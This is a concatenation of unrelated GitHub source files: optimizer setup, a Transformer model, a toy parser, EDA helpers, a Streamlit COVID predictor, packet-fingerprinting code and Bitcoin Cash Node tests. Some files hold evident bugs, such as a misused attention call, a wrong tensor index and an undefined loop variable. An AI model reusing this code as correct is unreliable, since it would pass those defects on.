else:
parameters = model.parameters()
if 'fused' in opt_lower:
assert has_apex and torch.cuda.is_available(), 'APEX and CUDA required for fused optimizers'
opt_split = opt_lower.split('_')
opt_lower = opt_split[-1]
if opt_lower == 'sgd' or opt_lower == 'nesterov':
optimizer = optim.SGD(
parameters, lr=args.lr, momentum=args.momentum, weight_decay=weight_decay, nesterov=True)
elif opt_lower == 'momentum':
optimizer = optim.SGD(
parameters, lr=args.lr, momentum=args.momentum, weight_decay=weight_decay, nesterov=False)
elif opt_lower == 'adam':
optimizer = optim.Adam(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'adamw':
optimizer = AdamW(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'nadam':
optimizer = Nadam(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'radam':
optimizer = RAdam(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'adamp':
optimizer = AdamP(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps,
delta=0.1, wd_ratio=0.01, nesterov=True)
elif opt_lower == 'sgdp':
optimizer = SGDP(
parameters, lr=args.lr, momentum=args.momentum, weight_decay=weight_decay,
eps=args.opt_eps, nesterov=True)
elif opt_lower == 'adadelta':
optimizer = optim.Adadelta(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'rmsprop':
optimizer = optim.RMSprop(
parameters, lr=args.lr, alpha=0.9, eps=args.opt_eps,
momentum=args.momentum, weight_decay=weight_decay)
elif opt_lower == 'rmsproptf':
optimizer = RMSpropTF(
parameters, lr=args.lr, alpha=0.9, eps=args.opt_eps,
momentum=args.momentum, weight_decay=weight_decay)
elif opt_lower == 'novograd':
optimizer = NovoGrad(parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'nvnovograd':
optimizer = NvNovoGrad(parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'fusedsgd':
optimizer = FusedSGD(
parameters, lr=args.lr, momentum=args.momentum, weight_decay=weight_decay, nesterov=True)
elif opt_lower == 'fusedmomentum':
optimizer = FusedSGD(
parameters, lr=args.lr, momentum=args.momentum, weight_decay=weight_decay, nesterov=False)
elif opt_lower == 'fusedadam':
optimizer = FusedAdam(
parameters, lr=args.lr, adam_w_mode=False, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'fusedadamw':
optimizer = FusedAdam(
parameters, lr=args.lr, adam_w_mode=True, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'fusedlamb':
optimizer = FusedLAMB(parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'fusednovograd':
optimizer = FusedNovoGrad(
parameters, lr=args.lr, betas=(0.95, 0.98), weight_decay=weight_decay, eps=args.opt_eps)
else:
assert False and "Invalid optimizer"
raise ValueError
if len(opt_split) > 1:
if opt_split[0] == 'lookahead':
optimizer = Lookahead(optimizer)
return optimizer
```
#### File: 1chimaruGin/EfficientDet/normalize.py
```python
import torch
from data.preprocess import csv_to_dataset
from data.loader import create_custom_loader
dataset = csv_to_dataset(path='data/train.csv')
loader = {x: create_custom_loader(dataset[x], batch_size=32,
num_workers=0) for x in ['train', 'val']}
def get_mean_std(loader):
# VAR[X] = E[X**2] - E[X**2]
channel_sum, channel_square_sum, num_batches = 0, 0, 0
for data, _, _ in loader['val']:
channel_sum += torch.mean(data.permute(1,2,0), dim=[0, 2, 3])
channel_square_sum += torch.mean(data**2, dim=[0,2,3])
num_batches += 1
mean = channel_sum / num_batches
std = (channel_square_sum / num_batches - mean**2)**0.5
return mean, std
mean, std = get_mean_std(loader)
print(mean, std)
``` |
{
"source": "1chimaruGin/KaMI",
"score": 2
} |
#### File: KaMI/utils/callbacks.py
```python
import re
from utils import camel2snake
class Callback():
_order = 0
def set_runner(self, run):
self.run = run
def __getattr__(self, k):
return getattr(self.run, k)
@property
def name(self):
name = re.sub(r'Callback$', '', self.__class__.__name__)
return camel2snake(name or 'callback')
def __call__(self, cb_name):
f = getattr(self, cb_name, None)
if f and f(): return True
return False
class TrainEvalCallback(Callback):
def fit_start(self):
pass
def fit_end(self):
pass
def epoch_start(self):
pass
def epoch_end(self):
pass
def validate_start(self):
pass
def validate_end(self):
pass
``` |
{
"source": "1chimaruGin/Transformer",
"score": 3
} |
#### File: Transformer/models/transformer.py
```python
import math
from turtle import forward
import torch
import torch.nn as nn
from .pos_encoding import positional_encoding
from .multihead_attn import MultiHeadAttention
from .utils import clone_module_list
class FeedForward(nn.Module):
def __init__(
self,
d_model: int,
features: int,
dropout: float = 0.1,
activation=nn.ReLU(),
is_gated: bool = False,
bias_1: bool = True,
bias_2: bool = True,
bias_gate: bool = True,
):
super(FeedForward, self).__init__()
self.layer_1 = nn.Linear(d_model, features, bias=bias_1)
self.layer_2 = nn.Linear(features, d_model, bias=bias_2)
self.dropout = nn.Dropout(dropout)
self.activation = activation
self.is_gated = is_gated
if is_gated:
self.linear_v = nn.Linear(d_model, features, bias=bias_gate)
def forward(self, x: torch.Tensor):
g = self.activation(self.layer_1(x))
if self.is_gated:
g = g * self.linear_v(x)
else:
x = g
x = self.dropout(x)
return self.layer_2(x)
class PositionalEmbedding(nn.Module):
def __init__(self, d_model: int, n_vocab: int, max_len: int = 5000):
super(PositionalEmbedding, self).__init__()
self.linear = nn.Embedding(n_vocab, d_model)
self.d_model = d_model
self.register_buffer("pos_encodings", positional_encoding(d_model, max_len))
def forward(self, x: torch.Tensor):
pe = self.pos_encodings[: x.shape, [0]].requires_grad_(False)
return self.linear(x) * math.sqrt(self.d_model) + pe
class LearnedPositionalEmbedding(nn.Module):
def __init__(self, d_model: int, n_vocab: int, max_len: int = 5000):
super(LearnedPositionalEmbedding, self).__init__()
self.linear = nn.Embedding(n_vocab, d_model)
self.d_model = d_model
self.pos_encodings = nn.Parameter(
torch.zeros(max_len, 1, d_model), requires_grad=True
)
def forward(self, x: torch.Tensor):
pe = self.pos_encodings[: x.shape[0]]
return self.linear(x) * math.sqrt(self.d_model) + pe
class TransformerLayer(nn.Module):
def __init__(
self,
d_model: int,
self_attn: MultiHeadAttention,
src_attn: MultiHeadAttention = None,
feed_forward: FeedForward = None,
dropout: float = 0.1,
):
super().__init__()
self.size = d_model
self.self_attn = self_attn
self.src_attn = src_attn
self.feed_forward = feed_forward
self.dropout = nn.Dropout(dropout)
self.norm_self_attn = nn.LayerNorm([d_model])
if self.src_attn is not None:
self.norm_src_attn = nn.LayerNorm([d_model])
self.norm_FFN = nn.LayerNorm([d_model])
self.is_save_FFN_input = False
def forward(
self,
x: torch.Tensor,
mask: torch.Tensor = None,
src: torch.Tensor = None,
src_mask: torch.Tensor = None,
):
z = self.self_attn(x)
self_attn = self.self_attn(q=z, k=z, v=z, mask=mask)
x = x + self.dropout(self_attn)
if src is not None:
z = self.norm_src_attn(x)
attn_src = self.src_attn(q=z, k=src, v=src, mask=src_mask)
x = x + self.dropout(attn_src)
z = self.norm_FFN(x)
if self.is_save_FFN_input:
self.FFN_Input = z.clone()
FFN = self.feed_forward(z)
x = x + self.dropout(FFN)
return x
class Encoder(nn.Module):
def __init__(self, layer: TransformerLayer, n_layers: int):
super(Encoder, self).__init__()
self.layers = clone_module_list(layer, n_layers)
self.norm = nn.LayerNorm(layer.size)
def forward(self, x: torch.Tensor, mask: torch.Tensor):
for layer in self.layers:
x = layer(x, mask)
return self.norm(x)
class Decoder(nn.Module):
def __init__(self, layer: TransformerLayer, n_layers: int):
super(Decoder, self).__init__()
self.layers = clone_module_list(layer, n_layers)
self.norm = nn.LayerNorm(layer.size)
def forward(self, x: torch.Tensor, memory: torch.Tensor, src_mask: torch.Tensor, tgt_mask: torch.Tensor):
for layer in self.layers:
x = layer(x, mask=tgt_mask, src=memory, src_mask=src_mask)
return self.norm(x)
``` |
{
"source": "1Chip1/Jyt-Language",
"score": 3
} |
#### File: Jyt-Language/Jyt/parser.py
```python
from ast import keyword
from lib2to3.pgen2 import token
class Parser:
def __init__(self, tokens):
self.tokens = tokens
self.AST = []
def add_node(self, parent, node):
for a in self.AST:
if parent in a:
a[parent].append(node)
def build_AST(self):
saved = {}
parent = {}
collect = False
for tokens in self.tokens:
if token['id'] == 'lable':
t = {token['value']: []}
if parent != t:
parent = token['value']
self.AST.append(t)
elif token['id'] == 'keyword':
if token['value'] == 'end':
t = {token['value']: 0}
self.add_node(parent, t)
else:
if collect == False:
saved = token
collect = True
else:
t = {saved['value']: token[:'value']}
self.add_node(parent, t)
collect = False
elif token['id'] == 'char':
if collect == False:
saved = token
collect = True
else:
t = {saved['value']: token['value']}
self.add_node(parent, t)
collect = False
``` |
{
"source": "1chiSensei/discord-bot",
"score": 3
} |
#### File: 1chiSensei/discord-bot/disco.py
```python
from disco.bot import Bot, Plugin
class SimplePlugin(Plugin):
@Plugin.listen('ChannelCreate')
def on_channel_create(self, event):
event.channel.send_message('Woah, a new channel huh!')
@Plugin.command('ping')
def on_ping_command(self, event):
event.msg.reply('Pong!')
@Plugin.command('echo', '<content:str...>')
def on_echo_command(self, event, content):
event.msg.reply(content)
``` |
{
"source": "1colete/dh_projeto_integrador",
"score": 4
} |
#### File: dh_projeto_integrador/bibliotecas/eda.py
```python
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
def EDA_values(df):
'''
cria uma tabela com os valores, MINIMO, MAXIMO E MEDIANO das colunas com mais de 23 valores unicos
caso a tenha menos valores coloca uma lista dos valores
df -> dataframe que será analisado
'''
print("")
counter=0
max_col_name_char = 0
for col_name in df.columns:
if len(col_name) > max_col_name_char:
max_col_name_char = len(col_name)+1
if len(df.columns) < 10:
digits = 0
elif len(df.columns) < 100:
digits = 1
else:
digits = 2
for i in df.columns:
if len(df[i].unique()) < 23:
print(' '*(digits-counter//10), counter, '|', i, ' '*(max_col_name_char - len(i))+'| ',
df[i].unique())
else:
try:
print(' '*(digits-counter//10), counter, '|', i,' '*(max_col_name_char - len(i))+'| '+'Min:', df[i].unique().min(),
'| Max:', df[i].unique().max(), '| Avg:',round(df[i].dropna().unique().mean(),2),
'| Median:',round(np.median(df[i].dropna().unique()),2))
except:
print(' '*(digits-counter//10), counter, '|', i,
' '*(max_col_name_char - len(i))+'| '+'Min:', df[i].unique().min(), '| Max:',
df[i].unique().max())
counter += 1
return None
def EDA_graphs(df, disc_cols , cont_cols, target):
'''
Plota os graficos do relacionamento da variavel target com as variaveis discretas e continuas
df -> dataframe que sera analisado
cont_cols -> lista de colunas continuas
disc_cols -> lista de colunas discretas
target -> coluna target
'''
for col in df.columns:
if col in disc_cols:
fig, ax = plt.subplots (1,2, figsize = (15,6))
fig.suptitle (f'Variavel {col}', fontsize = 20, fontweight = 'bold', y =1)
sns.countplot(x=col, data=df, ax=ax[0], ec='black')
ax[0].grid(axis = 'y')
ax[0].set_title(f'Distribuicao de dados {col}')
sns.barplot(x=col, y = target, data = df, ax=ax[1], ec='black', ci = None)
ax[1].grid(axis = 'y')
ax[1].set_title(f'{target} em funcao de {col}')
plt.show()
elif col in cont_cols:
fig, ax = plt.subplots (1,2, figsize = (15,6))
fig.suptitle (f'Variavel {col}', fontsize = 20, fontweight = 'bold', y =1)
sns.histplot(x=col, hue=target, data = df, ax=ax[0])
ax[0].set_title(f'Distribuicao de {col}')
sns.boxplot(x= target, y = col, data = df, ax=ax[1])
ax[1].set_title(f'Boxplot de {col} em funcao de {target}')
plt.show()
```
#### File: 1colete/dh_projeto_integrador/covid_app.py
```python
import streamlit as st
import joblib
import pickle
import pandas as pd
import numpy as np
import os
# import sklearn
#import sqlite3
#from monitor_for_app import *
# from variables import *
#from datetime import datetime
st.set_page_config(page_title = 'Previsor de COVID-19')
@st.cache
def load_data():
current_path = os.getcwd()
dados_path = os.path.join(current_path, 'dados\cleaned\df_preped.pkl')
df = pd.read_pickle(dados_path)
return df
def load_model():
# load_model = joblib.load(open(os.path.join(model),"rb"))
current_path = os.getcwd()
model_path = os.path.join(current_path, 'models/clf_tuned.pkl')
load_model = joblib.load(open(model_path, 'rb'))
return load_model
# load data
# df = load_data()
def main():
options = ['Início', 'Dados' ,'Predição','Sobre']
page_option = st.sidebar.selectbox('Páginas', options)
if page_option == 'Início':
st.title('Previsor COVID-19 ')
# st.markdown(home_page_text, unsafe_allow_html = True)
elif page_option == 'Dados':
st.title('Mais informações sobre o conjunto de dados')
# st.markdown(data_description, unsafe_allow_html = True)
# with st.expander('Estatisticas', expanded = False):
# st.write('Podemos ver estatisticas para as colunas numéricas.')
# st.write(df.describe())
# with st.expander('Valores Targets'):
# st.write(f'Temos {round(df.obito.value_counts(normalize = True)*100, 2)[1]} % de obtidos na base.')
# st.write(round(df.obito.value_counts(normalize = True)*100, 2))
elif page_option == 'Predição':
st.title('Predição')
cardiopatia = st.checkbox('cardiopatia')
diabetes = st.checkbox('diabetes')
doenca_neurologica = st.checkbox('Doenças neurológicas')
obesidade = st.checkbox('obesidade')
outros_fatores_de_risco = st.checkbox('outros_fatores_de_risco')
idade = st.slider('Idade: ', 0, 110, 29)
cs_sexo = st.selectbox( 'Sexo',
('Masculino', 'Feminino'))
if cs_sexo == 'Masculino':
cs_sexo = True
else:
cs_sexo = False
selected_options = [cardiopatia, diabetes, doenca_neurologica, obesidade, outros_fatores_de_risco , idade , cs_sexo]
sample_input = np.array(selected_options).reshape(1,-1)
model = load_model()
if st.button('Submit'):
# class prediction
prediction_class = model.predict(sample_input)
if prediction_class == 1:
prediction_class = 'ALTO RISCO'
else:
prediction_class = 'BAIXO RISCO'
st.success(f"Paciente com {prediction_class} de obito")
else:
st.title('Sobre')
# st.markdown(about_text, unsafe_allow_html = True)
main()
``` |
{
"source": "1computerguy/mercury",
"score": 2
} |
#### File: pmercury/utils/packet_proc.py
```python
import sys
from pmercury.protocols.tcp import TCP
from pmercury.protocols.tls import TLS
from pmercury.protocols.dtls import DTLS
from pmercury.protocols.http import HTTP
from pmercury.protocols.dhcp import DHCP
from pmercury.protocols.iquic import IQUIC
from pmercury.protocols.tls_server import TLS_Server
from pmercury.protocols.dtls_server import DTLS_Server
from pmercury.protocols.http_server import HTTP_Server
from pmercury.protocols.tls_certificate import TLS_Certificate
def pkt_proc(ts, data):
buf = data
ip_type = 4
if buf[12] == 0x08 and buf[13] == 0x00: # IPv4
ip_length = 20
ip_offset = 14
protocol = buf[23]
elif buf[12] == 0x86 and buf[13] == 0xdd: # IPv6
ip_type = 6
ip_length = 40
ip_offset = 14
protocol = buf[20]
elif buf[14] == 0x08 and buf[15] == 0x00: # IPv4 (hack for linux cooked capture)
ip_length = 20
ip_offset = 16
protocol = buf[25]
elif buf[12] == 0x81 and buf[13] == 0x00: # IPv4 (hack for 802.1Q Virtual LAN)
if buf[16] == 0x08 and buf[17] == 0x00: # IPv4
ip_length = 20
ip_offset = 18
protocol = buf[27]
elif buf[16] == 0x86 and buf[17] == 0xdd: # IPv6
ip_type = 6
ip_length = 40
ip_offset = 18
protocol = buf[24]
else:
return None
else: # currently skip other types
return None
data_len = len(data)
fp_str_ = None
fp_str_2_ = None
prot_offset = 0
if protocol == 6:
prot_offset = ip_offset+ip_length
if prot_offset+20 > data_len:
return None
prot_length = (buf[prot_offset+12] >> 0x04)*4
app_offset = prot_offset + prot_length
if buf[prot_offset+13] & 0x12 == 2:
fp_str_, context_ = TCP.fingerprint(data, prot_offset, app_offset, data_len)
fp_type = 'tcp'
elif data_len - app_offset < 16:
return None
elif buf[app_offset] == 22 and buf[app_offset+1] == 3:
if buf[app_offset+5] == 1 and buf[app_offset+9] == 3:
fp_str_, context_ = TLS.fingerprint(data, app_offset, data_len)
fp_type = 'tls'
elif buf[app_offset+5] == 2 and buf[app_offset+9] == 3:
fp_str_, context_ = TLS_Server.fingerprint(data, app_offset, data_len)
fp_type = 'tls_server'
fp_str_2_, context_2_ = TLS_Certificate.fingerprint(data, app_offset, data_len)
fp_type_2 = 'server_certs'
elif buf[app_offset+5] == 11:
fp_str_, context_ = TLS_Certificate.fingerprint(data, app_offset, data_len)
fp_type = 'server_certs'
elif buf[app_offset+2] == 84:
if (buf[app_offset] == 71 and buf[app_offset+3] == 32):
fp_str_, context_ = HTTP.fingerprint(data, app_offset, data_len)
fp_type = 'http'
elif (buf[app_offset] == 72 and buf[app_offset+5] == 49):
fp_str_, context_ = HTTP_Server.fingerprint(data, app_offset, data_len)
fp_type = 'http_server'
elif protocol == 17:
prot_offset = ip_offset+ip_length
prot_length = 8
app_offset = prot_offset + prot_length
if data_len - app_offset < 16:
return None
elif buf[app_offset] == 22 and buf[app_offset+1] == 254:
if buf[app_offset+13] == 1 and buf[app_offset+25] == 254:
fp_str_, context_ = DTLS.fingerprint(data, app_offset, data_len)
fp_type = 'dtls'
elif buf[app_offset+13] == 2 and buf[app_offset+25] == 254:
fp_str_, context_ = DTLS_Server.fingerprint(data, app_offset, data_len)
fp_type = 'dtls_server'
elif (buf[app_offset+1] == 0xff and buf[app_offset+2] == 0x00 and
buf[app_offset+3] == 0x00 and buf[app_offset+4] == 0x18):
fp_str_, context_ = IQUIC.fingerprint(data, app_offset, data_len)
fp_type = 'iquic'
elif data_len - app_offset < 240:
return None
elif (buf[app_offset+236] == 0x63 and
buf[app_offset+237] == 0x82 and
buf[app_offset+238] == 0x53 and
buf[app_offset+239] == 0x63):
fp_str_, context_ = DHCP.fingerprint(data, app_offset, data_len)
fp_type = 'dhcp'
if fp_str_ == None:
return None
src_port = int.from_bytes(buf[prot_offset:prot_offset+2], byteorder='big')
dst_port = int.from_bytes(buf[prot_offset+2:prot_offset+4], byteorder='big')
if ip_type == 4:
o_ = prot_offset-8
src_ip = f'{buf[o_]}.{buf[o_+1]}.{buf[o_+2]}.{buf[o_+3]}'
o_ += 4
dst_ip = f'{buf[o_]}.{buf[o_+1]}.{buf[o_+2]}.{buf[o_+3]}'
else:
o_ = prot_offset-32
src_ip = (f'{buf[o_]:02x}{buf[o_+1]:02x}:{buf[o_+2]:02x}{buf[o_+3]:02x}:'
f'{buf[o_+4]:02x}{buf[o_+5]:02x}:{buf[o_+6]:02x}{buf[o_+7]:02x}:'
f'{buf[o_+8]:02x}{buf[o_+9]:02x}:{buf[o_+10]:02x}{buf[o_+11]:02x}:'
f'{buf[o_+12]:02x}{buf[o_+13]:02x}:{buf[o_+14]:02x}{buf[o_+15]:02x}')
o_ += 16
dst_ip = (f'{buf[o_]:02x}{buf[o_+1]:02x}:{buf[o_+2]:02x}{buf[o_+3]:02x}:'
f'{buf[o_+4]:02x}{buf[o_+5]:02x}:{buf[o_+6]:02x}{buf[o_+7]:02x}:'
f'{buf[o_+8]:02x}{buf[o_+9]:02x}:{buf[o_+10]:02x}{buf[o_+11]:02x}:'
f'{buf[o_+12]:02x}{buf[o_+13]:02x}:{buf[o_+14]:02x}{buf[o_+15]:02x}')
flow = {'src_ip':src_ip,
'dst_ip':dst_ip,
'src_port':src_port,
'dst_port':dst_port,
'protocol':protocol,
'event_start':ts,
'fingerprints': {}}
if fp_type != 'server_certs':
flow['fingerprints'][fp_type] = fp_str_
else:
if 'tls' not in flow:
flow['tls'] = {}
flow['tls'][fp_type] = fp_str_
if context_ != None and context_ != []:
flow[fp_type] = {}
for x_ in context_:
flow[fp_type][x_['name']] = x_['data']
if fp_str_2_ != None:
if fp_type_2 != 'server_certs':
flow['fingerprints'][fp_type_2] = fp_str_2_
else:
if 'tls' not in flow:
flow['tls'] = {}
flow['tls'][fp_type_2] = fp_str_2_
if context_2_ != None and context_2_ != []:
flow[fp_type_2] = {}
for x_ in context_2_:
flow[fp_type_2][x_['name']] = x_['data']
return flow
``` |
{
"source": "1cost/Life-in-a-Building",
"score": 3
} |
#### File: Life-in-a-Building/data/images.py
```python
import time
import urllib
import numpy as np
import cv2
# Import functions
from ips import *
# Return the current time
def getCurTime():
t = time.localtime()
s = time.strftime("%d_%b_%y_%H_%M_%S", t)
return s
# Return an image from a given ip address
def getImg(ip):
# Access the image and convert bytes to numpy array
req = urllib.urlopen("http://"+ip+"/axis-cgi/jpg/image.cgi")
arr = np.asarray(bytearray(req.read()), dtype=np.uint8)
img = cv2.imdecode(arr, -1)
return img
# Draw bounding box based on object detection
def draw_bounding_box(img, class_id, confidence, x, y, x_plus_w, y_plus_h):
label = str(class_id)
color = [0,255,0]
cv2.rectangle(img, (x,y), (x_plus_w,y_plus_h), color, 2)
cv2.putText(img, label, (x-10,y-10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
``` |
{
"source": "1Crazymoney/bitcoin-cash-node",
"score": 2
} |
#### File: test/functional/bchn-rpc-gbtl-bg-cleaner.py
```python
import glob
import os
import threading
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, wait_until
from test_framework import messages, blocktools
class GBTLightBGCleanerTest(BitcoinTestFramework):
""" Functional tests for the getblocktemplatelight background "cleaner" thread that removes data from the
gbt/ directory. We set the timeout to a short time and then observe job data first going to the trash/ folder
and then being removed completely. """
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2 # We need connected nodes for getblocktemplatelight RPC to function (bitcoind node policy)
self._cache_size = 5
self._store_time = 10
args = [
'-gbtcachesize={}'.format(self._cache_size),
'-gbtstoretime={}'.format(self._store_time),
]
self.extra_args = [args] * self.num_nodes
def run_test(self):
# generate just 1 block to leave IBD state (no wallet is required for this test so we use hard-coded key)
self.nodes[0].generatetoaddress(1, self.nodes[0].get_deterministic_priv_key().address)
self.sync_all()
gbtl0 = self.nodes[0].getblocktemplatelight()
gbtl1 = self.nodes[1].getblocktemplatelight()
assert_equal(gbtl0, gbtl1)
# some random tx's from mainnet and testnet. They don't have to be valid on this chain for this test.
txs = [
"01000000016af14fe2b65b3fabe6a8f125de5ded1180aff9c3892138eefc16242f2dadfe2f00000000fd8a0100483045022100d80"
"fa2758e4c1bc2b5b687b59d853c3a97e2b343b9ae1cb2bea0dce0e2cb1ca602200ac71e79dcde5d065ac99160be3376c8a373c016"
"<KEY>"
"056922cc8fa4d14eed39a69287a89c9d630164c23f4f810fa774e3feb6cdfea584147304402203f6a7ab7a5b91b0495ff6be292a5"
"eee74bbf5c7b1cc6de586002ccf4142059a302200cf80778d4f4c078073d840b027a927a11d227bb87cbd043c37989f5cb01861c4"
"14cad532102962feabd55f69c0e8eaceb7df43969dda4aeb575c7a501a4d08be392b2c48f2a2102a0e6e0def65cdb686a85c9a5cc"
"03fc4c524831806f03cc7a18463b5267a5961421030b61fc10e70ca4fcedf95ca8284b545a5a80f255205c1c19e5eebcadbc17365"
"921036d623ebfc46b97eb99a43d3c45df09319c8a6c9ba2b292c1a6a42e460034ed7a2103f54a07c2b5e82cf1e6465d7e37ee5a4b"
"0701b2ccda866430190a8ebbd00f07db55aefeffffff022c1172000000000017a914e78564d75c446f8c00c757a2bd783d30c4f08"
"19a8740e88e02000000001976a91471faafd5016aa8255d61e95cfe3c4f180504051e88ac48a80900",
"0100000002ae54229545be8d2738e245e7ea41d089fa3def0a48e9410b49f39ec43826971d010000006a4730440220204169229eb1"
"7dc49ad83675d693e4012453db9a8d1af6f118278152c709f6be022077081ab76df0356e53c1ba26145a3fb98ca58553a98b1c130a"
"2f6cff4d39767f412103cfbc58232f0761a828ced4ee93e87ce27f26d005dd9c87150aad5e5f07073dcaffffffff4eca0e441d0a27"
"f874f41739382cb80fdf3aac0f7b8316e197dd42e7155590c1010000006a47304402203832a75ccfc2f12474c1d3d2fc22cd72cc92"
"4c1b73995a27a0d07b9c5a745f3a022035d98e1017a4cb02ff1509d17c752047dca2b270b927793f2eb9e30af1ac02d6412103cfbc"
"58232f0761a828ced4ee93e87ce27f26d005dd9c87150aad5e5f07073dcaffffffff0260ea00000000000017a9149eefc3ae114359"
"8a830d66cbc32aa583fa3d987687fb030100000000001976a914bddb57be877bd32264fc40670b87b6fb271813f688ac00000000",
"0100000001993b9740d3e289876cbe6920008a35c4a08b7dc4bd48ff61b198f163af3f354900000000644102a8588b2e1a808ade29"
"4aa76a1e63137099fa087841603a361171f0c1473396f482d8d1a61e2d3ff94280b1125114868647bff822d2a74461c6bbe6ffc06f"
"9d412102abaad90841057ddb1ed929608b536535b0cd8a18ba0a90dba66ba7b1c1f7b4eafeffffff0176942200000000001976a91"
"40a373caf0ab3c2b46cd05625b8d545c295b93d7a88acf3fa1400",
]
node = self.nodes[0]
gbt_dir = os.path.join(os.path.join(node.datadir, 'regtest'), 'gbt')
trash_dir = os.path.join(gbt_dir, 'trash')
def path_for_job(jid): return os.path.join(gbt_dir, jid)
def trash_path_for_job(jid): return os.path.join(trash_dir, jid)
self.log.info("gbt_dir: {}".format(gbt_dir))
self.log.info("trash_dir: {}".format(trash_dir))
gbtl = []
seen_jobs_in_gbt_dir = set()
seen_jobs_in_trash_dir = set()
stop_flag = threading.Event()
def poll_thread():
"""This thread is necessary to scan the gbt_dir and trash_dir and not miss any files.
It is a workaround to very slow gitlab CI (especially on aarch64)."""
nonlocal seen_jobs_in_trash_dir, seen_jobs_in_gbt_dir
while not stop_flag.wait(0.100): # poll every 100ms
trashed_jobs = set(os.path.basename(x) for x in glob.glob(trash_path_for_job("*")))
gbt_dir_jobs = set(os.path.basename(x) for x in glob.glob(path_for_job("*")))
seen_jobs_in_trash_dir |= trashed_jobs
seen_jobs_in_gbt_dir |= gbt_dir_jobs
# start the poller thread -- this is necessary to work around CI bugs brought on by slowness on aarch64
pthr = threading.Thread(target=poll_thread, daemon=True)
pthr.start()
try:
# generate a bunch of unique job_ids
txs_tmp = txs
n_iters = self._cache_size * 3 # intentionally overfill past cache size
assert n_iters
for _ in range(n_iters):
gbtl.append(node.getblocktemplatelight({}, txs_tmp))
txs_tmp += txs
finally:
# Ensure subordinate poller thread is stopped, joined
stop_flag.set()
pthr.join()
assert os.path.isdir(gbt_dir)
assert os.path.isdir(trash_dir)
job_ids = {x['job_id'] for x in gbtl}
assert len(job_ids) == n_iters
# constrain the set now to the jobs we expect just in case there is monkey business
# with the gbt dir or trash dir having gotten extra files above, somehow.
seen_jobs_in_trash_dir &= job_ids
seen_jobs_in_gbt_dir &= job_ids
# Note: due to a possible race condition in the case of this test executing slowly,
# the job_id file may be gone now and moved to trash -- so also check the set `seen_jobs_in_gbt_dir`
assert all(os.path.exists(path_for_job(x)) or x in seen_jobs_in_gbt_dir
for x in job_ids)
trashed_ids = set() | seen_jobs_in_trash_dir
removed_ids = set() | {x for x in seen_jobs_in_trash_dir
if not os.path.exists(path_for_job(x))}
def predicate():
for j in job_ids:
if os.path.exists(trash_path_for_job(j)):
trashed_ids.add(j)
elif not os.path.exists(path_for_job(j)):
removed_ids.add(j)
return job_ids == removed_ids
wait_until(predicate, timeout=self._store_time * 2)
assert_equal(job_ids, removed_ids)
assert_equal(job_ids, trashed_ids)
assert len(trashed_ids) > 0
# grab ids for jobs that are no longer in the in-memory LRU cache -- they should all raise now that their
# job data was deleted from disk.
job_ids = [x['job_id'] for x in gbtl[:-self._cache_size]]
assert job_ids and len(job_ids) == (n_iters - self._cache_size)
# now, test that all the deleted ones are truly gone and raise the proper RPC error
for i, job_id in enumerate(job_ids):
tmpl = gbtl[i]
block = messages.CBlock()
block.nVersion = tmpl["version"]
block.hashPrevBlock = int(tmpl["previousblockhash"], 16)
block.nTime = tmpl["curtime"]
block.nBits = int(tmpl["bits"], 16)
block.nNonce = 0
coinbase_tx = blocktools.create_coinbase(height=int(tmpl["height"]) + 1)
coinbase_tx.vin[0].nSequence = 2 ** 32 - 2
coinbase_tx.rehash()
block.vtx = [coinbase_tx]
assert_raises_rpc_error(-8,
"job_id data not available",
node.submitblocklight,
block.serialize().hex(), job_id)
if __name__ == '__main__':
GBTLightBGCleanerTest().main()
```
#### File: test/functional/bchn-rpc-getblocktemplate-sigops.py
```python
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
connect_nodes_bi
)
from test_framework.cdefs import (
BLOCK_MAXBYTES_MAXSIGCHECKS_RATIO,
DEFAULT_EXCESSIVE_BLOCK_SIZE,
ONE_MEGABYTE
)
class GetBlockTemplateSigopsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [[], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def reinit_node(self, node_id, new_extra_args):
self.stop_node(node_id)
self.start_node(node_id, new_extra_args)
connect_nodes_bi(self.nodes[0], self.nodes[1])
self.sync_all()
# Both getblocktemplate() and getblocktemplatelight() should yield same values for sigop and size limits
def assert_case(self, name, node_id, excessive_size):
self.log.info("Asserting case " + name)
expected_sigops = excessive_size // BLOCK_MAXBYTES_MAXSIGCHECKS_RATIO
self.log.info("- using getblocktemplate()")
tpl = self.nodes[node_id].getblocktemplate()
assert_equal(tpl['sigoplimit'], expected_sigops)
assert_equal(tpl['sizelimit'], excessive_size)
self.log.info("- using getblocktemplatelight()")
tpl = self.nodes[node_id].getblocktemplatelight()
assert_equal(tpl['sigoplimit'], expected_sigops)
assert_equal(tpl['sizelimit'], excessive_size)
def run_test(self):
# Generate 101 blocks, setup tx and sync nodes
self.nodes[0].generate(101)
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), "1")
self.sync_all()
# Check against the first node, which runs with default params
self.assert_case("when using DEFAULT_EXCESSIVE_BLOCK_SIZE", 0, DEFAULT_EXCESSIVE_BLOCK_SIZE)
# From now on, we will test on second node with various values for excessiveblocksize
# When below default size
target_size = int(DEFAULT_EXCESSIVE_BLOCK_SIZE*0.67)
self.reinit_node(1, ["-excessiveblocksize=" + str(target_size)])
